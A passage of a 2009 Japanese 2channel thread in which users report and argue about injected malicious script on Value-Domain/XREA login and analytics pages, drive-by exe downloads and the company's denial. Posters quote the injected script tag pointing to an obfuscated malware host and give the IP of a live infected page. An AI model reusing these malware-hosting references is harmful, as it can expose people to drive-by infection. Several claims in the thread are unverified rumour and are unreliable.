ある。ほぼ同じコードが入っている。jp.js 532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:17:36 0] >>530のソースは確かに確認できた。 けどやはりアクセス解析の方はもう無いみたいだよ。 533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:10 0] リアルタイムで改竄されてるの？ 534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:24 0] たった今消えたな なんかついたり消えたりしてる？ 535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:18:30 0] いやはやなんともｗ 釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない 自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないｗ 536 名前：529 [2009/07/08(水) 16:18:54 0] わろたｗｗｗなんだこいつｗ 537 名前：154 mailto:sage [2009/07/08(水) 16:18:55 0] 問い合わせてから2営業日経とうとしているがその後の回答が全く無い ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない！ 技術に自信がないのか？ブランド信用力の低下が怖いのか？（今さら！） ＶＤとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。 今回の件だけはVDのトップページで公式にアナウンスして欲しかった。 改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。 538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:19:56 0] 念のため全ページのソース見てきた。 今のとこはコード入ってないようだ。 539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:23 0] 16:17 の時点に wget で確認したけど、確かに混入してるね。 バランサで混入ありソースとなしソースが流れてるんじゃね？ 540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:25 0] 魚拓のURLをよく見ろスキームはhttpsだ。 これがねつ造であるなら、SSLでなりすましが可能である事を示してる。 541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:42 0] >>511 おもいっきり仕込まれてる。ソースで言うと62〜68行目。 64行目に 1856317799:888/jp.js がある。 542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:20:55 0] デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか 543 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:21:29 0] 消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。 544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:22:23 0] それだと上げてるやつが一番怪しく思えるぞｗ まーそんなことはないでしょ 545 名前：539 [2009/07/08(水) 16:23:13 0] こいつぜってー頭狂ってるｗ 546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:23:14 0] ax.xrea.comは全部のページやられてるなｗ 547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:23:31 0] >>539 うわ、まじだ >Name: ax.xrea.com >Addresses: 219.101.229.188, 219.101.229.189 前者に不正コード確認、後者はなし ttp://219.101.229.188/login.php (現時点で不正コード注意) 548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:07 0] この板に社員が常駐して、問題があるたびに直しているとしか思えないな 549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:22 0] 魚拓がちょうど今メンテナンス中で取れないんだよなぁ 何が起こっているのかだけでも早く知りたいよ アナウンスしろよVD 550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:44 0] >>539が正解じゃないか？ 551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:24:48 0] >>539 ax.xrea.comは2台だな。 219.101.229.188 ←やられてる 219.101.229.189 ←やられてない 552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:25:17 0] さっきからコードないないって書き込んでる奴だけど >>547のURLでなら確認できた。 553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:25:25 0] >>548 それはそれで対応してくれてるなら助かるけどさ 再アップロードしてはい直しました！って話だったらトルチョックかましたくなる 554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:26:01 0] とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。 ありindex.html：11818 byte で CR+LF なしindex.html：11310 byte で LF diff は改行コード以外は 62〜68 行目の SCRIPT だけだね。 555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:26:11 0] >>547 専ブラで飛んじゃうような貼り方するなよ… 556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:27:20 0] 魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな >>555 すまん、以後http全部抜くわ 557 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:28:38 0] アクセス解析タグに仕込むことも出来るんじゃと思ったら ぞっとした 558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:28:40 0] ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなｗｗ たぶん、リアルタイムに罠貼ったり外したりしてるｗ 俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、 5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。 559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:29:50 0] 踏んできた。一発でヒット www1.axfc.net/uploader/He/so/233661.png dlkey: dxvwvd 560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:30:13 0] バレる前に削除して、定期的にパスを抜いてんだろうな よくよく考えるとかなり深刻じゃないか？ 561 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:31:09 0] >>445 「個人情報の取り扱いについて」で ＞ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。 ＞自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。 とはあるけど、果たして罰せられるのかねえ 「責任の限界について」で>>141に加えて ＞あらゆるユーザーデータの操作処理 もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか ＞あらゆる非常事態が発生したことによる損失 今回のことが非常事態といえるのか ＞あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失 あらゆる原因に法的例外とかはないのか とここまで考えて思ったんだけど。。。 562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:32:03 0] 責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ 563 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:33:32 0] でも不正コード削除してもログは残るんじゃないの？ 内部の人が書き換えてるじゃなければ、分かりそうなもんだよね？ 564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:33:38 0] これやばいだろ… 565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:35:14 0] ここのアクセス解析使ってるとこたくさん見るから やばいんじゃないかな…さすがに。 566 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:35:50 P] >>561 法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった？ 果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。 567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:01 0] value-domainならまだ利用者数はそれほどでもないだろうけど xreaとなると話はだいぶ違ってくるね 568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:17 0] 魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・ と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろｗ 569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:36:43 P] アクセス解析のサーバーとバリュドメのサーバーは別だよね。 デジロ関係が軒並み侵入されてるってこと？ >>563 同意。 570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:37:31 0] いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。 >>554 index.htmlは存在しない。index.php。 このサーバのPHPの出力に全部くっついてくる気がする。 571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:10 0] >>570 あぁ、すまん。そういやそうだね。 572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:13 0] こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな jsの中身見たら不正コードに混じって忍者TOOLS提供の アクセスカウンタのコードが入っていて憎たらしいと思った 573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:39:49 0] いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。 すべてのphpスクリプトの安全宣言出るまで使えないでしょ。 574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:05 0] 規約の法的拘束力って限界あるよね 電子商取引等に関する準則 ?目次? 第１．オンライン取引_ 5(3) なりすましを生じた場合の認証機関の責任 74.125.155.132/search?q=cache:_khHgPhY4rcJ:www.meti.go.jp/topic/downloadfiles/e2032 575 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:19 0] >セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。 internet.watch.impress.co.jp/docs/special/20090708_300654.html 今回の事と関係なし？ 576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:23 0] こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず で、公式発表は、改ざんはないんだっけ？　どうなの、これ 577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:42:56 P] XREAとかにFTPのログインしても大丈夫なんだろうか 578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:43:19 0] 忍者のアクセスカウンタだと…？ 579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:43:35 0] >>575 いやそのものずばりだよ。 580 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:43:40 0] お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。 581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:44:03 0] 今回のはjpgに仕組まれてるのが怖いな 582 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 16:44:26 0] gifとswfにも入ってるよ 583 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:45:19 0] VALUE DOMAIN サービス利用規約には 準拠法、管轄裁判について 当規約には日本法が適用されます。また、当規約、当サービスに関わる一切の紛争は、大阪地方裁判所の専属管轄とします。 とある 大阪地裁だから Yahoo! BB顧客情報漏洩事件 ja.wikipedia.org/wiki/Yahoo!_BB%E9%A1%A7%E5%AE%A2%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6 584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:47:00 0] >>579 サンクス そのものずばりですか・・・ 585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:48:24 0] >>578 いじり中ですかｗ pdfとswfとmsvidctlスクリプト、および降ってくるexeについては ベンダーにも送ってあるしセキュ板にもアップしてあります。 586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:50:01 0] 降ってくるexe、一応カスペルスキーだと処理してくれるね 他は知らんけど 587 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:50:56 0] >>575 先月からIEから火狐に乗り換えておいてよかった…本当によかった… 588 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:52:11 0] >>265で報告したのに 589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:53:31 0] 改ざんがないってことは、自分でやってんじゃね？ 590 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:57:15 0] 社員のいたずらだったりしてｗ 591 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:57:28 0] ２ちゃんねるの情報なんて参考にならない すべて捏造で壮大な釣りかもしれない 592 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:59:28 0] >>591 2chでも嘘を書けば逮捕されるのでそれはない 593 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 16:59:39 0] ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。 594 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:01:01 0] 魚拓って改ざんされないの？ 595 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 17:01:53 0] ttp://www.avertlabs.com/research/blog/index.php/2009/07/07/an-artemis-view-of-0-day-attack/ 大阪辺りの赤丸は… 596 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:02:57 0] このスレは以下の五大勢力で構成されています 混乱させようと、改竄はないと嘘を言ってるヤツ：1人(>>580とかそのへん) 改竄を目の当たりにしたヤツ：数人 怖くて確認できないけど心配してるヤツ：多数 リアルタイムで弄ぶ改竄クラッカー：1人 デジロ工作員：数人 597 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:03:47 0] >>596 お前はどれ？ 598 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:04:51 0] 降ってくるexeって何？ 599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:04:55 0] 俺はガンダムだ 600 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:05:02 0] 改竄を目の当たりにしたヤツじゃないと信じられない流れだろ 601 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:05:07 0] >>597 俺はlogin.phpの改竄を目の当たりにした人間 602 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:05:59 0] アクアナは現時点で確認できるでしょ？>>600 603 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:07:07 0] >>602 いや俺は一番浮かれてたバカだよ、書き込み後に真っ先に見た 604 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:07:46 0] 5月末からのネームサーバ大障害の放置も捏造でプッシュするのかな？ 605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:07:51 0] jsをオフにして、アクロバットリーダーとフラッシュプレイヤーを最新にして、 fix itとか言う奴をやっとけば大丈夫？ 606 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:08:20 0] >>598 exeがPCにいつのまにかDLされてくる 何も表示ないし、隠しフォルダにはいってくるからレジストリみてないとわからんかもしれんけど 普通はセキュリティソフトが防ぐから、ノーセキュリティのときのみだが 607 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:08:36 0] VDもアレだが、そもそもVD狙って改竄してる奴は誰なんだ？ 608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:09:53 0] >>606 ありがとう。 昨日アクアナにカスペが反応したときはビビッた。 609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:09:57 0] こうなってくると去年の改竄さわぎもデジロの説明じゃ納得できんな スクリプトの脆弱性なのか、それともサーバの脆弱性なのか サーバの脆弱性だったらレンサバの方も危ない 610 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:10:09 0] exeはキーロガーっぽいけど ログインパスだけじゃないよな。どこまで狙ってるんだろ 611 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:10:57 0] 結局1年経っても何の対応もしてないよな。 612 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:11:10 0] アクアナ関連はxrea絡みだからxreaスレでやれば？ 2スレが噴いた方が捏造煽りの子も喜ぶんじゃね？ 613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:12:04 0] アクアナは専用スレがあったはず 614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:13:24 0] >>613 【アクセス解析】AccessAnalyzer.com Part5【XREA】 pc11.2ch.net/test/read.cgi/hp/1234096306/ 615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:13:58 0] 本来はサポートフォーラムでやった方がいいんだけどね 616 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 17:14:18 0] login.php のソース読んだ限りぜんぜん問題なさそうだが? js自体ほとんど使ってないし なにが問題なんだ? 617 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:14:57 0] ブラウザからダウンロードするのって、かならずダウンロード前にウィンドウが出たり、上のバーがでるもんだと思ってた セキュリティホールつくと本当になにも表示されないんだな、気がついたらDLされてて驚いた 勉強になったわ 618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:14:58 0] あんまり情報が分散すると、見るのがたいへんというのもあるんだよね。 619 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:15:10 0] ソースを読めても日本語読めないのかよ 620 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:15:24 0] 実質的にここがデジロック総合スレだと思ってたわ 621 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:16:04 0] >>614 2分でスレ拾ってくるとは仕事が速いねｗ いや、前から知ってるけどそれ製作板だよね？ xrea系列のサービスなんだからxreaスレでやりゃいいじゃん。 その方がいつもの捏造煽りの子も同板内で2ヶ所同時にスレ噴いて楽しめるから良いかなと。 622 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:16:05 0] >>617 降ってくるexe？ どこにダウンロードされるの？ ファイル名教えて。 623 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:16:24 0] 問題のところｒ開いて、ソース見たけど、中身が何もない でもexeはDLされて、カスペルスキーが反応する。これどういう技術？　怖いんだけど 624 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:18:08 0] IE使ってないけどなんかこわいからFix itしてきた 625 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:18:10 0] >>621 その趣旨なら、複数の板で騒いだ方がいいんじゃね？ でも、オレは分散するとめんどくさい派 626 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:19:27 0] カスペルスキーとアバストの報告はあるし、ノートンは対応してるらしいよね、告知では。 ウイルスバスターはどう？ 627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:20:46 0] >>625 だな。 先に行って待ってりゃデジロ社員共々やって来るだろうからそうするわ。 628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:21:56 0] >>607 保守管理しているシナ人じゃねぇの、前回と同じ集団 629 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:22:24 0] js切ってると不便だね。 自分が、jsオフでも別の手段でフォローするようなサイト作りをしてるから、 それが無いサイトを見ると、なんかムカつく。 630 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:25:55 0] ブラウザで表示されているリンクをクリック、または立ち上げるだけで それ以上の操作を必要することなく、 ユーザはふと気付くと、シームレスに自動でソフトがインストールされ使用できる状態になっている そう考えると、無駄な操作がはぶけてストレスのたまらない便利な技術だよね、これ 631 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:26:52 0] gigazineに垂れ込もうかと思ったら、 jsオフだとメールフォームが表示されない。 632 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:27:39 0] そこはONにしてもいいだろ 633 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:28:10 0] ax.xrea.com wepawet.cs.ucsb.edu/view.php?hash=58ad9f9f57a66bdddf69e86e9701cbc6&t=1247041861&type=js ax.xrea.com/login.php wepawet.cs.ucsb.edu/view.php?hash=9fab8d84e3289b2a7c5f9cdbd4043c09&t=1247041318&type=js 634 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:28:33 0] >>605 なるべくならIE以外を使用する 635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:29:40 0] >>633 これ踏むとどうなるの？ 636 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:30:16 0] VDの公式告知ﾏﾀﾞｰ 637 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:31:08 0] >>607 狙ってるわけじゃなくてきっと無差別攻撃の結果陥落しただけ 638 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:34:40 0] このスレだけレンタル鯖板で異常なほど速い……速すぎだろ 異常事態だから当然かもしれんが 639 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:35:19 0] 落書きはすぐに消さないと、ルーズな住民が多い場所だと認知されて、 どんどん落書きが増え、治安も悪くなるって話があるけど、それと同じじゃね？ カウンターや広告の不具合がずっと続いてるし、サポートBBSもろくな対応をしない。 そういう状況だと狙われやすいんじゃないのかな？ 640 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:36:26 P] そーいやカウンターは使ってないけど、あれは大丈夫なのか？ 641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:36:33 0] >>637 いや、DNS攻撃の頃からターゲットはしてたと思うよ 642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:38:02 0] とりあえず、俺らに出来ることは、出来るだけこの件を多くの人に広めることだ。 俺はgoogleアドセンスのスレにこの件を書いてきた。 お前らもVD使ってそうな人がいるスレには何か書き込んだほうがいいかも。 643 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:38:34 0] maliciousとかどんだけー 644 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:41:35 0] これでうっかりVDが消滅されても困るんだけどなｗ 645 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:42:20 0] >>461がガセネタであればいいのだが。 646 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:46:26 0] 出たり消えたりしてるみたいだからサポートが確認出来てないのかもしれんが それだと根本的に何の対策もしてないって事だよな 647 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:49:04 0] 問題を認識してるのにしらばっくれてるのと、 問題を認識できていないのと、 どっちが怖い？ 648 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:49:10 0] 記事は今のところ検索かけてもこのくらいしか引っかからないな www.mudaijp.com/wp/5596.html ilion.blog47.fc2.com/blog-entry-140.html miracosta-s59nov21.cocolog-nifty.com/weblog/2009/07/post-7477.html 649 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:49:11 0] ここまで騒ぎになってる割に「ドメインを乗っ取られた」系の被害（報告）が無いのが不思議。 650 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:52:52 0] 219.101.229.188/login.php ↑の</HEAD>直前のjs.src ="1856317799:888/jp.js";ってのがウイルス？ 651 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:53:41 0] 派手にのっとることが目的じゃなくマルウェア配布が目的なので こっそりとやってるのです 652 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:54:01 0] せめて危険なURLは全角で書いてくれ クリックするだけでウイルス感染するかもしれんだろ 653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:54:09 0] ごめんリンクになってる削除依頼出すから踏まないでね 654 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 17:56:34 0] >>650 おいおい何してんだお前 655 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:01:41 P] ちょっと出掛けてた間にまたえらい騒ぎになってるな。 で騒ぎが一段落したら、またさっきみたいに改竄は捏造だとか 名無しソースは当てにならんとか言う奴出てくるのかな。 656 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 18:02:36 0] おいおい、なんか、どんどん被害大きくなるな。 大丈夫か？この会社は。 657 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:05:05 0] 実被害が出ない限り騒ぎそのものはこのまま収束する可能性が高い その後で騒ぐ奴は粘着としてスルーされるだろうし まぁ無関係の俺は公式リリースをwktkして待つぜｗ 658 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:06:18 0] ギャーまじですか 今頃気づいたorz >>649 2週間ほど前によくわからん理由でVDアカウント凍結された＞＜ だれかにアカウント乗っ取られた可能性がある サポートに連絡した後、担当部署の対応待ちだったんだが まったく音沙汰なくてしびれを切らしてたところ 659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:07:24 0] >>658 「よくわからん理由」plz 660 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:13:36 0] >>659 自分では購入した覚えのないドメインを指摘され、それが利用規約に違反してるといわれた 管理画面にそもそも入れないから確認しようがないんだけど 661 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:18:54 0] 2週間前ってこのスクリプト組み込まれてたの？ 662 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:22:00 0] その疑問はあるね・・・ 違うパターンで乗っ取られた可能性も考えられるから、まだ何ともいえない 663 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:27:35 0] 本人がよくわからんならデジロに対して証明はできんな この会社は「可能性がある」だけじゃ絶対自分の非とは認めないだろ 664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:28:41 P] これか。 ＞639 ：名無しさん＠お腹いっぱい。 ：2009/06/24(水) 08:25:45 0 ＞Value-domainとxreaは最低、 ＞勝手にアカウントを取り消された。 ＞10個前後のドメインと借りたサーバはパー。 ＞メールしても返事なし。 10ドメインと鯖は痛いな。 665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:38:11 0] もしかしたらかなり前からクラッカーに狙われていて 裏で目立たないようにいろいろ動いていたのかも。 ウィルスも常に表示するよりたまに表示するほうが 気づかれにくくて対策されないし。 666 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:39:37 0] こえー アンカーすらまともにつけられない阿呆もいるし 667 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:45:38 0] 10個前後と言ってる時点で怪しいと思うんだけど。へん？ 668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 18:46:10 0] >>664 それ別の人。 ドメイン持ってるの２つだが、長年使ってただけに失うのは痛いわ あああなんとかして移管手続きとれないものか 669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:00:41 0] Windows Vista または Windows Server 2008 を使用しているお客様については、 Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、 この脆弱性の影響を受けません。 だってよ XP＼(＾o＾)／ オワタ 670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:15:51 0] pc11.2ch.net/test/read.cgi/sec/1227543474/ 671 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:24:14 0] >>669 Win7にするといいおｗｗ でも、今回の乗っ取りはOSは問題じゃないぜ 事件はデジロ内部で起こっている 672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:26:03 0] あのすいません こんな時に何ですがVDネム鯖が6月のはじめからずっと脂肪してる件については… 673 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:28:03 0] どこに移転するかが問題だなぁ・・・ どこかおすすめありませんか？ ドメイン管理しか使ってないけど。 674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:29:17 0] レジストラは鉄板があんまないよなあ 675 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:29:21 0] そういう話は専スレでやれ 676 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 19:33:05 0] value-domain 御中 口コミのパワーをなめんなよ 隠蔽したら口コミで広がるからね 677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:34:36 P] >>668 てことは、 ひょっとすると同時期に同じような被害を受けてる人が複数いるって事になるかも。 何が起きているのか考えると、ちょっと恐ろしいね。 678 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:36:53 P] 報告はないけど、カウンターは改竄されてはいない？ カウンターってあまりログインしないからわからんのかな。 679 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:37:40 0] >>660 > 自分では購入した覚えのないドメインを指摘され 自分で購入した覚えがないなら、なんてドメインか晒せるだろ？ ドメイン名出してみ。 680 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:39:16 0] >>678 カウンターはウイルス関係なく先々月からのネームサーバ障害でずっと死んでるだろ？ 681 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:39:28 0] >>660 そのドメイン名を具体的に教えてほしい. 身に覚えがないなら, 個人の特定は無理だと思うから. いったい何に使われているドメインなのか興味がある. 682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 19:40:10 